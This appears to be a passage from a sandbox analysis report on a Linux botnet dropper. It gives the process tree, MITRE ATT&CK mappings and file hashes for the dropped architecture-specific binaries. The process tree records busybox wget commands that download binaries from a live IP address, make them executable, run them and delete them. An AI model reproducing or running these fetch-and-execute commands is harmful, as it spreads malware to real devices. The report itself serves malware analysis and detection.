  - Executes dropped EXE
  PID:1043
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:1045
- /bin/busybox
  busybox wget -O s-.-pa.-rc http://89.147.110.254/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:1046
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:1047
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:1048
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:1050
- /bin/busybox
  busybox wget -O a-.-r.-m.-4 http://89.147.110.254/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:1051
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:1052
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:1053
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:1055
- /bin/busybox
  busybox wget -O a.-.--.r.--m-.--5 http://89.147.110.254/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:1056
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:1057
- /tmp/a.-.--.r
  ./a.-.--.r
  2⤵
  PID:1058

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-.-r.-m.-4

Filesize
137KB

MD5
105bd89794b076e6863c5f407b1faf34

SHA1
0b02315f30e75896951ffcfcf08b5aaa95679f63

SHA256
a0e6aec1293e05825323c9d06bbb4a043b05a425df506aa6641d8fb47fa230bd

SHA512
80954d2f2b6ec737b6db70309773dda487b6c05ad46677fbdad859699bd91e04e685422c274c1a229b24eae07c2dc183d57d29822b27753afb7f428698a6213a

Download Submit
/tmp/a.-.--.r.--m-.--5

Filesize
175KB

MD5
7c91c482ce6ae001948305f7530ede64

SHA1
3c7e7f57d13a1a7380b8ae37706ff060165ec384

SHA256
a489bedd4b9d9362d37bea448c9a715b6751b91c7d9f9edff9c546f5f7e98eb6

SHA512
ad51cce5923ad1f138e991684136327bef550e81e9564e3a0abf767e9fd24083ea124db5672e981c6db801f93f2e15cfdd62867d2365b54d054481330c63b7ca

Download Submit
/tmp/a.-r.-m6

Filesize
175KB

MD5
40951b394dd67294d75ec3bdf6b4c29b

SHA1
11fdfe412942982e5558bd82c470227515bc8b8c

SHA256
21df9f08a733eb357376ecf3b3b189bfb96b13fd78a5da9c9ab467c7f7cf1556

SHA512
69057891eb19b392c633d0707813f51c270102ad42e5cafd23d90a78339308f9fa5112f5b2544a3a383ac32c9fad6857a1baa8d2fffbc7b76572aa3a4b1dbd72

Download Submit
/tmp/a.r.-.m7

Filesize
175KB

MD5
0571c6f56980acc3884e33783b8924ef

SHA1
729b81e525bf50b3b1a20a1497f9a2108f23cf6d

SHA256
f258636ff0cab31ce592d1f029c4e039717516deb2867f6f46bae62d6e4bc67d

SHA512
33b2b8c329888cdbe68cf08c247d4863552c2d90a2a59a5d964895a84e7b6bfd652795c2dc30382de69fb241f1778a279def0bd2404a1446878980beedddb98c

Download Submit
/tmp/i--6.-.86

Filesize
109KB

MD5
b1d8f0d32fb0803aa4bf5085252844af

SHA1
454a12105fbe89f31efcd4b759519aeed5cbe3d9

SHA256
76522474b7ea2756bf601139b11dda8e1820de230d9bb21eb68936f58fdfd0fb

SHA512
2bb992d0d3ea82e31d71e210b150da8ab889962a9768e9ee9f3d98e06f9cc449f153afe8ddafcb856adcadc274754bbc833214d178aa8fb111316602bb11d3f7

Download Submit
/tmp/i5.-.8..-6

Filesize
105KB

MD5
c33f0770b86bb927147ac7cf8fac3f35

SHA1
f354380df03b3d8d38f5e797837bff84d2a2a67c

SHA256
c3c90781e5ca95e27ce005ad15b63ae5bfe39fdd5e157ee260b110a5cf0a5393

SHA512
2e3e8575b4022e26f4dcd98749372a7afa73dd6d7811b8e4afc5022a185ea09b8ce37890594fb91e200e8f9bd0241ea43232baf2974141bebfa3999dbe9f2f82

Download Submit
/tmp/m-.ips

Filesize
178KB

MD5
255b36e1851a841337309520b566d7de

SHA1
2ad3dac208e90017f6136678f70e2b67e8525a72

SHA256
bcdb2e42e632e1d3ac619fadb70da4902d007ca77e18d904f66989a43d043947

SHA512
0872a270ed5f02b3ea106ad9b6bae141f2069e271589ec3cbc67fde24b8a0825c0c058250d9250e0409475119c709e9bbb29bdc8ba5b004be17b07806f36601d

Download Submit
/tmp/m-i.p.-se.l

Filesize
178KB

MD5
72bc4d1633ded83797c3464dee5242b5

SHA1
3f9443303a04c6cdad069ebe356c3c2588bc0fd4

SHA256
2b40117cfc2b464a0b7634197ee5f0e00cc173a001bf1de3c51438966fa367e7

SHA512
8e8de6a2661bdfbe124bbdda9558cc3986f87bb9878a977497acd2654902bc40d6777f4e4391f500be46e8d775902986adf4b11f915f59ea54e42610835b5418

Download Submit
/tmp/m.-..-6-.-8k

Filesize
129KB

MD5
a0edb8314a40b3edf6ae67c8880f2781

SHA1
b4a821cea80d6b9c448fa71c919cc0aae000c94d

SHA256
d13cfefc137d7382cbf866ce3c4aa6fbbaf1f837969dc1936db337eb3c92523a

SHA512
d2504e429b58c82894a9cc8cd426fab4dad34833595085ef9ec7065232c3a2494372198993ca203ae22268ad8271b7be633867248382b5dad15562616a5203be

Download Submit
/tmp/p--.-pc

Filesize
130KB

MD5
7a459c0b5e539a6bc06097f9e88852de

SHA1
7fc8f658b86ec13d2a452d9c05ad2ae6a75d47c2

SHA256
4746cd7da13b44906b7f2d740b5a5eaee1bf7ed4ebabe99a11580fb7c15de8bd

SHA512
673a3741fab8316ca4ce6ae52b00c994eeef119e43a538c3ebbbcee97add49ded6ce71aa697f9f9971912641d02861b636f7f92c7253763a51de86bd1c0cd88f

Download Submit
/tmp/p-.-.p.-.c

Filesize
208B

MD5
a7ca1278c23ad0afd81c74cd6fe42282

SHA1
62735e99907c66c544538f2c1b7d8b51a0f405ae

SHA256
e3671fd945a1abbcfc3675aa47a5729d98e8cb452628dfa5bded3cfa378ed2dd

SHA512
3403b6a21253ba88c3744b4736621d42302c94963e0a8c76a535fd710ed6c1453ff032286933aecb3841a7e18078ccb56ffb16ebafacf0046a631f14635ddc42

Download Submit
/tmp/s-.-pa.-rc

Filesize
152KB

MD5
bcba260b8a959128859e78e094082367

SHA1
62d9518a26a4fd39f5ae9b46063e759ae3250b4a

SHA256
b7c8d54409f065b1170b2b08ae1a27442d7afbf4ed3699cb1fc542889e1be26a

SHA512
dc40d736a35ba32b3c695f357f5221322b32dbcf54a1cb85fcc0365037f2f89b26db7887e28daa8e4747247aa371c204a54d665adbe7c2ef3fe23de1b97ba247

Download Submit
/tmp/s-..-h-.4

Filesize
123KB

MD5
2876cde48f5413158fb754faee2e690b

SHA1
27cd667d0f8f0dfa53921f15498e9267952512e7

SHA256
15e65616aaab1b7169c68802cfd163c579315563e8e690b330921c6e47887e63

SHA512
ae6ae122af2613854ebaaf713f1779703364989657de71550a6bf253e8ee34a4a63134cd3bf6c30b33ab631ebd03d2b1ac9023811dc8c4472b60addb0d6409b0

Download Submit
/tmp/x.8-.-6.-

Filesize
127KB

MD5
bc606e2a29883af58cae0ae4bceee2bf

SHA1
e1e89cfdbcf76b02add923235dfcca6be36cf0b7

SHA256
2106595f3c70c299aed2df62154aea4a6d56a35f050303800b87bb842fc12039

SHA512
62ca0f2f3bf64c09c3113f7531467066f8b38d9e66cb8254a360aaf06206fc4f2545c81f64a6c25f9916c8aa5623cc3f65f0f6e07c72943f770fcb2061fca0aa

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads